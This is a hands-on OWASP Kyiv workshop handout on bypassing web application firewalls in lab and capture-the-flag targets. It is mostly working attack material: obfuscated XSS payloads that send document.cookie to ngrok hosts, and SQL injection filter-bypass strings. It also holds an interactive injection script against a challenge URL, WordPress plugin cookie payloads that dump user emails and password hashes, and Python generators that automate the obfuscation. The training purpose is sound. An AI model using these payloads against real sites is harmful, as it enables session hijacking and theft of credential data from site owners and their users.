OWASP_KIEV_WAF_BYPASS_WORKSHOP
Requirements:
- Kali Linux
- Basic knowledge of SQL injection and XSS attacks
- An account on:
- https://lab.pentestit.ru/
- https://www.root-me.org
- A good mood ;)
Registration on lab.pentestit.ru, step by step:
1) create an account here: https://lab.pentestit.ru/signup
2) log in to the site from Kali Linux -> navigate to https://lab.pentestit.ru/how-to-connect
3) download the OpenVPN config file and the credentials
4) create the folder /root/TestLab/ and copy the VPN config file and the credentials there
5) start OpenVPN with that config (e.g. openvpn --config /root/TestLab/<config file>.ovpn)
Agenda:
Intro - a few words about WAFs, a high-level summary of different WAF bypass cases
1st Part:
- Browser console practice
- Filter bypass in stored XSS (https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass)

2nd Part:
- A few words about SQL injection techniques
- A little SQL terminal practice
- Filter bypass in union-based SQL injection (https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-filter-bypass)

3rd Part (WAF bypass example from TestLab 12 by PentestIT):
- Short intro and threat modeling (discovering the vulnerability during information gathering)
- Vulnerability confirmation
- Code review of the vulnerable WP plugin
- A little practice in the PHP interactive shell (debugging and discovering the WAF bypass technique)
- WAF bypass in SQL injection (2 cases)
ALTERNATIVES:

alert('OWASP Ukraine')

prompt('OWASP Ukraine')
confirm('OWASP Ukraine')
alert(/ OWASP Ukraine/.source)

console.log("OWASP Ukraine")
console.error("OWASP Ukraine")
console.trace("OWASP Ukraine")

window[/al/.source+/ert/.source](/OW/.source+/ASP/.source)
eval(["al","ert"].join``)(["O","W","A","S","P"].join``)
\u0061\u006c\u0065\u0072\u0074`\x4f\x57\x41\x53\x50\x20\x55\x6b\x72\x61\x69\x6e\x65`

EVAL
eval('ale'+'rt(0)');
(eval)(alert`OWASP`)
Function("ale"+"rt('OWASP')")();
new Function`al\ert\`OWASP\``;
setTimeout('ale'+'rt("OWASP")');
setInterval('ale'+'rt("OWASP")');
Set.constructor('ale'+'rt("OWASP")')();
Set.constructor`al\x65rt\x28/OWASP/.source\x29```;
Set.constructor`al\x65rt\x28\x22OWASP\x20WorkShop\x22\x29```


['alert`OWASP`'].map(eval)
['alert`OWASP`'].find(eval)
['alert`OWASP`'].every(eval)
['alert`OWASP`'].filter(eval)
['alert`OWASP`'].findIndex(eval)
['alert`OWASP`'].forEach(eval);
[\u0061\u006c\u0065\u0072\u0074`\x4f\x57\x41\x53\x50\x20\x55\x6b\x72\x61\x69\x6e\x65`].forEach(setInterval);
["\x61\x6c\x65\x72\x74\x28\x22\x4f\x57\x41\x53\x50\x22\x29"].map(eval)
(\xNN escapes are only valid inside strings and template literals, not in identifiers, so the hex form has to be quoted; \uXXXX escapes work in both)


[\u0061\u006c\u0065\u0072\u0074`\x4f\x57\x41\x53\x50 \x4b\x69\x65\x76 \x57\x69\x6e\x74\x65\x72 \x4d\x65\x65\x74\x75\x70 \x32\x30\x31\x39`].forEach`setInterval`;




["\x61\x6c\x65\x72\x74\x28\x22\x57\x65\x6c\x63\x6f\x6d\x65\x22\x29","\x61\x6c\x65\x72\x74\x28\x22\x54\x6f\x20\x4f\x57\x41\x53\x50\x22\x29","\x61\x6c\x65\x72\x74\x28\x22\x57\x69\x6e\x74\x65\x72\x20\x4d\x65\x65\x74\x75\x70\x20\x32\x30\x31\x39\x22\x29"].map(setTimeout)

document.location.href="https://www.owasp.org/index.php/Ukraine"
window['location']['href']="https://www.owasp.org/index.php/Ukraine"
window.location.assign("https://www.owasp.org/index.php/Ukraine")


constructor.constructor("aler"+"t('OWASP')")();
constructor.constructor.constructor("aler"+"t('OWASP')")();
[].filter.constructor('ale'+'rt("OWASP")')();
[]['filter']['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72']('\x61\x6c\x65'+'rt("OWASP")')();

Common ENCODING
base64:
btoa('text_to_encode')
atob('text_to_decode')
(eval)(atob`YWxlcnRgV2ludGVyIFdBRiBXb3JrU2hvcGA=`)
(eval)(atob(/YWxlcnRgV2VsY29tZSB0byBPV0FTUCBVa3JhaW5lIFdvcmtTaG9wICBg/.source))


String.fromCharCode(charcode_here)

eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 87, 101, 108, 99, 111, 109, 101, 32, 116, 111, 32, 79, 87, 65, 83, 80, 32, 85, 107, 114, 97, 105, 110, 101, 32, 87, 111, 114, 107, 83, 104, 111, 112, 39, 41))


\u0065val(String.from\u0043har\u0043ode(97, 108, 101, 114, 116, 40, 39, 87, 101, 108, 99, 111, 109, 101, 32, 116, 111, 32, 79, 87, 65, 83, 80, 32, 87, 105, 110, 116, 101, 114, 32, 77, 101, 101, 116, 117, 112, 32, 87, 111, 114, 107, 83, 104, 111, 112, 39, 41))


var _0xd3c0d3 = ["Welcome to WorkShop","document","alert"]
with(_0xd3c0d3[1])eval(_0xd3c0d3[2])(_0xd3c0d3[0])
with(document)alert("Welcome to WorkShop")
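The alternatives above were written by hand. As an added example (written for this page, not part of the workshop notes), the same transformations automated in Python, so any sink/argument pair can be turned into the \u-identifier, \x-template, String.fromCharCode, split-name and base64 spellings. The output is JavaScript text to paste into the console; the function names are this example's own.

```python
import base64

# Added example (not from the workshop notes): generate the obfuscated spellings
# listed above from a plain  sink('arg')  call. Pure string work; the result is
# JavaScript meant for a browser console or an event handler, not run here.


def unicode_identifier(name):
    """\\uXXXX escapes are legal inside JavaScript identifiers, so `alert` can be
    spelled without the letters a-l-e-r-t ever appearing in the request."""
    return "".join("\\u%04x" % ord(c) for c in name)


def hex_string(text):
    """\\xNN escapes are legal in strings and template literals, NOT in identifiers
    (that is why the list above puts them only between quotes or backticks)."""
    return "".join("\\x%02x" % ord(c) for c in text)


def char_codes(text):
    """Argument list for String.fromCharCode()."""
    return [ord(c) for c in text]


def base64_literal(text):
    """atob() call with the base64 wrapped in /.../.source so no quote is needed.
    A '/' would end the regex literal and '++' (or a leading '+') is an invalid
    quantifier, so those fall back to a tagged template, atob`...`, which also
    needs no quotes (atob coerces the strings array to a string)."""
    b64 = base64.b64encode(text.encode("latin-1")).decode("ascii")
    if "/" in b64 or "++" in b64 or b64.startswith("+"):
        return "atob`%s`" % b64
    return "atob(/%s/.source)" % b64


def variants(sink, arg):
    """Equivalent spellings of sink('arg'); every one evaluates to the same call."""
    call = "%s('%s')" % (sink, arg)
    half = len(sink) // 2
    return {
        "plain": call,
        # \u identifier + \x template literal, e.g. \u0061...`\x4f...`
        "unicode_identifier": "%s`%s`" % (unicode_identifier(sink), hex_string(arg)),
        # property lookup with the name assembled from regex sources
        "split_name": "window[/%s/.source+/%s/.source]('%s')" % (sink[:half], sink[half:], arg),
        # whole call rebuilt from char codes and eval'd
        "char_codes": "eval(String.fromCharCode(%s))" % ", ".join(str(c) for c in char_codes(call)),
        # base64 decoded at runtime, through eval or the Function constructor
        "base64_eval": "(eval)(%s)" % base64_literal(call),
        "function_ctor": "[].filter.constructor(%s)()" % base64_literal(call),
    }


if __name__ == "__main__":
    for name, code in variants("alert", "OWASP Ukraine").items():
        print("%-20s %s" % (name, code))
```

Run it and paste any line into the console; all of them pop the same alert. The base64 fallback matters in practice: base64 output can contain `/` and `+`, and both break the `/.../.source` trick, which is why the notes use the tagged-template form `atob\`...\`` in some places.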


SENDING a value to an external resource:

innerHTML = "<HTML tag with a src attribute>"
document.write("the same")
var x = document.createElement('HTML tag with a src attribute')
x.src = "external resource"
document.body.appendChild(x)

(new Image()).src = 'http://1b150cb3.ngrok.io/?HelloOWASP'
(the request goes out as soon as src is assigned; the image does not have to be appended to the DOM)
https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass

http://challenge01.root-me.org/web-client/ch21/

XSS attack plan:
1) discover HTML injection
2) discover an HTML5 element the whitelist lets through
3) confirm XSS
4) prepare the payload
5) obfuscate or encode the payload
6) log in with the stolen admin cookie



<button autofocus onfocus = [].filter.constructor(atob(/YWxlcnQoZG9jdW1lbnQuY29va2llKQ==/.source))()></button>


Testing PARAMETERS


url=http://c532ef6d.ngrok.io
var x = new Image();x.src='http://c532ef6d.ngrok.io/?cookie='+escape(document.cookie)


<form><button onfocus=(eval)(atob(/KG5ldyBJbWFnZSgpKS5zcmM9J2h0dHA6Ly9jYmMwM2I0OC5uZ3Jvay5pby9jb29raWU9Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ==/.source)); autofocus >

<button autofocus onfocus = \u0061lert(0) ></button>

<button autofocus onfocus = [].filter.constructor(atob(/dmFyIHggPSBuZXcgSW1hZ2UoKTt4LnNyYz0naHR0cDovL2M1MzJlZjZkLm5ncm9rLmlvLz9jb29raWU9Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ==/.source))()></button>
Tools:
https://github.com/d3vilbug/HackBar

http://www.waraxe.us/sql-char-encoder.html

Before we begin:

Stacked queries:
select 1;select 2;insert into user values(1337,'Hacker','Password');

Union based SQLi:
select 111,222 union select 333,444 union select 777,888;

Error based:
Subquery (duplicate-key trick: group by on floor(rand(0)*2) makes MySQL fail with "Duplicate entry '<our data>:1' for key ...", so the error message carries the result):
and (select 1 from (select count(*),concat((<your query here, it must return a single row>),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)
select 111 and (select 1 from (select count(*),concat((version()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x);

UpdateXML and ExtractValue (an invalid XPath expression is echoed back in the error message; only the first 32 characters are shown, so use substring() for longer values):

and updatexml(null,concat(0x3a,(OUR QUERY HERE)),null)
and updatexml(null,concat(0x3a,(select database())),null)

and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))
and extractvalue(0x0a,concat(0x0a,(select database())))



WAF bypass techniques from the OWASP page

https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF

Bypassing WAF: SQL Injection - Normalization Method
/?id=1/*union*/union/*select*/select+1,2,3/*
index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*

Using HTTP Parameter Pollution (HPP)
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
On platforms that join repeated parameters with a comma (ASP/IIS) the server sees one value, and the commas land inside the comments:
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users

Bypassing WAF: SQL Injection - HTTP Parameter Fragmentation (HPF)
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);

/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--



SQL injection

Boolean-based blind:
and ascii(substring(database(),1,1)) = 115 -- -

SELECT ALTERNATIVE (prepared statement built from a hex literal, needs stacked queries; the hex below is the statement select concat(database(),0x20,version(),0x0a,"Welcome To OWASP Ukraine")):
set @x=0x73656C65637420636F6E63617428646174616261736528292C307832302C76657273696F6E28292C307830612C2257656C636F6D6520546F204F5741535020556B7261696E652229;
prepare inj from @x;execute inj;

WHITESPACES (characters MySQL accepts between tokens when a plain space is filtered):
• %09 = horizontal tab
• %0a = line feed, new line
• %0b = vertical tab
• %0c = form feed, new page
• %0d = carriage return
• %a0 = non-breaking space

SEL\nECT user FR\tOM mys\tql.user;
MySQL itself does not accept a keyword split by whitespace; the line above only works when the application strips those characters (\n, \t) before the query reaches the database, so the keyword filter sees SEL\nECT while the server sees SELECT.



Comma BYPASS (a JOIN of single-column subqueries instead of a comma-separated column list):

select 111,222 union select * from (select 'x')a join(select 'y')b;
https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-filter-bypass
http://challenge01.root-me.org/web-serveur/ch30/


Plan for the challenge:
1) detection with id=2-1: if the same row as id=1 comes back, the arithmetic was evaluated by SQL and the value reaches the query unquoted
2) %a0 as the whitespace character (spaces are filtered)
3) count the columns from the table definition left in the page source
4) enumerate the filtered operators
5) determine which uppercase keywords pass the whitelist
6) find the column that is echoed
7) extract the admin password

id=0%a0UNION%a0SELECT%a0*%a0FROM%a0(SELECT%a01)a%a0JOIN%a0(SELECT%a02)b%a0JOIN%a0(SELECT%a03)c%a0JOIN%a0(SELECT%a04)d

id=0%a0UNION%a0SELECT%a0*%a0FROM%a0(SELECT%a01)a%a0JOIN%a0(SELECT%a02)b%a0JOIN%a0(SELECT%a03)c%a0JOIN%a0(SELECT%a0(SELECT%a0pass%a0From%a0membres%a0LIMIT%a01))d
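The two payloads above, the SELECT alternative and the whitespace list are all instances of the same few transformations. As an added example (written for this page, not the workshop's own code), a small Python builder that produces the comma-free, space-free UNION payload for any column count and target position, and the prepare/execute form of any statement. The `membres` table and the %a0 trick come from the notes; the function names are this example's own.

```python
import string

# Added example (not from the workshop notes): build the comma-free,
# space-free UNION payloads used against the root-me challenge above for any
# column count and target position, plus the prepare/execute SELECT
# alternative. The challenge's `membres` table and %a0 trick come from the
# notes; the function names are this example's own.

# URL-encoded characters MySQL accepts between tokens when a plain space is filtered
WHITESPACE_ALTERNATIVES = ("%09", "%0a", "%0b", "%0c", "%0d", "%a0")


def hex_literal(text):
    """MySQL reads 0x... as a string, so no keyword of `text` is visible to a filter."""
    return "0x" + text.encode("latin-1").hex().upper()


def prepared_select(query):
    """Run a SELECT without the word SELECT in the request (needs stacked queries)."""
    return "set @x=%s;prepare inj from @x;execute inj;" % hex_literal(query)


def commaless_select(values):
    """SELECT v1,v2,...,vn without commas: one single-column subquery per value,
    JOINed, so `SELECT *` returns them as one row of n columns."""
    if len(values) > len(string.ascii_lowercase):
        raise ValueError("only %d aliases available" % len(string.ascii_lowercase))
    parts = ["(SELECT %s)%s" % (v, string.ascii_lowercase[i]) for i, v in enumerate(values)]
    return "SELECT * FROM " + " JOIN ".join(parts)


def union_payload(column_count, target, position, space="%a0"):
    """UNION with `target` in column `position` (1-based) and markers 1..n in the
    others; every space is replaced by `space` before the payload goes in the URL."""
    if not 1 <= position <= column_count:
        raise ValueError("position must be between 1 and %d" % column_count)
    values = [str(i) for i in range(1, column_count + 1)]
    values[position - 1] = target
    return ("UNION " + commaless_select(values)).replace(" ", space)


def membres_password_payload(space="%a0"):
    """The challenge's membres table has 4 columns (id, username, pass, email);
    the notes put the password subquery in the 4th one."""
    return union_payload(4, "(SELECT pass From membres LIMIT 1)", 4, space)


if __name__ == "__main__":
    print("id=0%a0" + membres_password_payload())
    for ws in WHITESPACE_ALTERNATIVES:
        print("id=0" + ws + union_payload(4, "database()", 1, ws))
    print(prepared_select('select concat(database(),0x20,version(),0x0a,"Welcome To OWASP Ukraine")'))
```

The markers 1..n in the unused columns are what lets you see which column is echoed before swapping the real subquery in; swapping `space` lets you try each whitespace alternative against the filter without retyping the payload.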





import requests
import sys

# OWASP KIEV WINTER MEETUP 2019
#
# (c) Mister_Bert0ni
#
# Payload = UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d

"""
SOURCE CODE (HTML comment left in the challenge page):
<!--
// CREATE TABLE IF NOT EXISTS membres (
// id int(1) NOT NULL AUTO_INCREMENT,
// username VARCHAR(5) NOT NULL,
// pass VARCHAR(20) NOT NULL,
// email VARCHAR( 50 ) NOT NULL,
// PRIMARY KEY (id)
// ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;
-->
"""

# id=-1 so the original row is not returned and only the UNION rows show;
# the trailing %A0 is the first "space" before the injected SQL
url = "http://challenge01.root-me.org/web-serveur/ch30/?action=membres&id=-1%A0"
print("To stop the script enter 'exit'\n")
while True:
    # spaces are filtered by the challenge; %A0 is still whitespace for MySQL
    payload = input("SQL:> ").replace(" ", "%A0")
    if payload == 'exit':
        sys.exit()
    try:
        print(payload)
        r = requests.get(url + payload)
        print(r.url)
        # the query result follows the HTML comment that holds the table schema
        print(r.text.split('-->')[1].split('</body>')[0].replace('<br />', ' '))
    except Exception:
        print("Connection error...")
View the source of http://site.test.lab/

href='http://site.test.lab/wp-content/plugins/wp-survey-and-poll/templates/assets/css/wp_sap.css?ver=4.9.8'
(the plugin path in the stylesheet URL gives away the installed plugin)

searchsploit -w WordPress Plugin Survey

https://www.exploit-db.com/exploits/45411

https://www.exploit-db.com/apps/58cad03b651fb89471cf372b0f201278-wp-survey-and-poll.zip

Vulnerable code in the plugin (the wp_sap cookie goes through json_decode and implode before it reaches the query):
else {
    if ( isset( $_COOKIE[ 'wp_sap' ] ) ) {
        $survey_viewed = json_decode( stripslashes( $_COOKIE[ 'wp_sap' ] ) );
    }
    if ( ! empty( $survey_viewed ) ) {
        $sv = implode( $survey_viewed );

PHP interactive shell practice (php -a):
print implode(["Welcome ", " to ", "OWASP Meetup"]);
$cookie = json_decode('["\u004f\u0057\u0041\u0053\u0050\u0020\u004d\u0045\u0045\u0054\u0055\u0050"]');
var_dump($cookie);
print $cookie[0];


Case 1: keyword letters hidden with JSON \u escapes (json_decode restores them, so the WAF never sees "union" or "select"):
wp_sap=["OWASP')) \u0055nion \u0053elect null,null,null,null,null,null,null,null,null,\u0063oncat(us\u0065r_email,0x203a3a20,us\u0065r_pass),null from wp_us\u0065rs #"]

Case 2: keywords split across array elements, glued back together by implode():
wp_sap=["OWASP')) uni","on sel","ect null,null,null,null,null,null,null,null,null,CAST(name as CHAR),null from token #"]
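Both cookie shapes above rely on the same thing: the WAF inspects the raw cookie, the plugin inspects the decoded one. As an added example (written for this page, not part of the plugin or the notes), a Python script that produces both shapes from a plain SQL fragment and replays the plugin's json_decode + implode on them, so you can check that the SQL arriving at the query is exactly the one intended. The keyword list and the function names are this example's own choices.

```python
import json
import re

# Added example (not from the plugin or the notes): produce the two cookie
# shapes shown above from a plain SQL fragment and replay what the plugin does
# with the cookie (json_decode, then implode) to check the SQL that reaches the
# query is the intended one. The keyword list is this example's own choice.

KEYWORDS = ("union", "select", "concat", "from", "user")
_KEYWORD_RE = re.compile("|".join(map(re.escape, KEYWORDS)), re.IGNORECASE)

# the two cookies from the notes, kept here to check the replay against them
COOKIE_CASE_1 = r'''["OWASP')) \u0055nion \u0053elect null,null,null,null,null,null,null,null,null,\u0063oncat(us\u0065r_email,0x203a3a20,us\u0065r_pass),null from wp_us\u0065rs #"]'''
COOKIE_CASE_2 = r'''["OWASP')) uni","on sel","ect null,null,null,null,null,null,null,null,null,CAST(name as CHAR),null from token #"]'''


def json_unicode_escape(word, count=1):
    """Spell the first `count` characters as \\uXXXX: still valid JSON, same value after decoding."""
    return "".join("\\u%04x" % ord(c) for c in word[:count]) + word[count:]


def cookie_escaped_keywords(sql):
    """Case 1: one JSON string in which every keyword starts with a \\u escape, so a
    WAF matching on 'union'/'select' sees neither, while json_decode() restores them."""
    encoded = json.dumps(sql)  # quotes and backslashes in the SQL become JSON escapes first
    return "[%s]" % _KEYWORD_RE.sub(lambda m: json_unicode_escape(m.group(0)), encoded)


def cookie_split_keywords(sql):
    """Case 2: a JSON array where each keyword is cut in half across two elements;
    implode() with no separator glues the pieces back into the original SQL."""
    pieces, last = [], 0
    for m in _KEYWORD_RE.finditer(sql):
        mid = m.start() + len(m.group(0)) // 2
        pieces.append(sql[last:mid])
        last = mid
    pieces.append(sql[last:])
    return json.dumps(pieces)


def php_side(cookie):
    """What the plugin computes: implode(json_decode($cookie)), PHP's default glue is empty."""
    return "".join(str(v) for v in json.loads(cookie))


if __name__ == "__main__":
    sql = "OWASP')) union select null,concat(user_email,0x203a3a20,user_pass),null from wp_users #"
    for cookie in (cookie_escaped_keywords(sql), cookie_split_keywords(sql)):
        print(cookie)
        print("  -> " + php_side(cookie))
```

`php_side` is the check to run before sending anything: if it does not return your SQL unchanged, the cookie is malformed and the plugin will silently get an empty array rather than an injection.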
Information about OWASP security events can be found here:


@OWASP_UA
Forwarded from OWASP Kyiv Chapter
All OWASP Kyiv Winter 2019 talks will appear later on our YouTube channel: https://www.youtube.com/c/owaspKyiv. For now you can subscribe to it and turn on 🔔 so you don't miss a single video.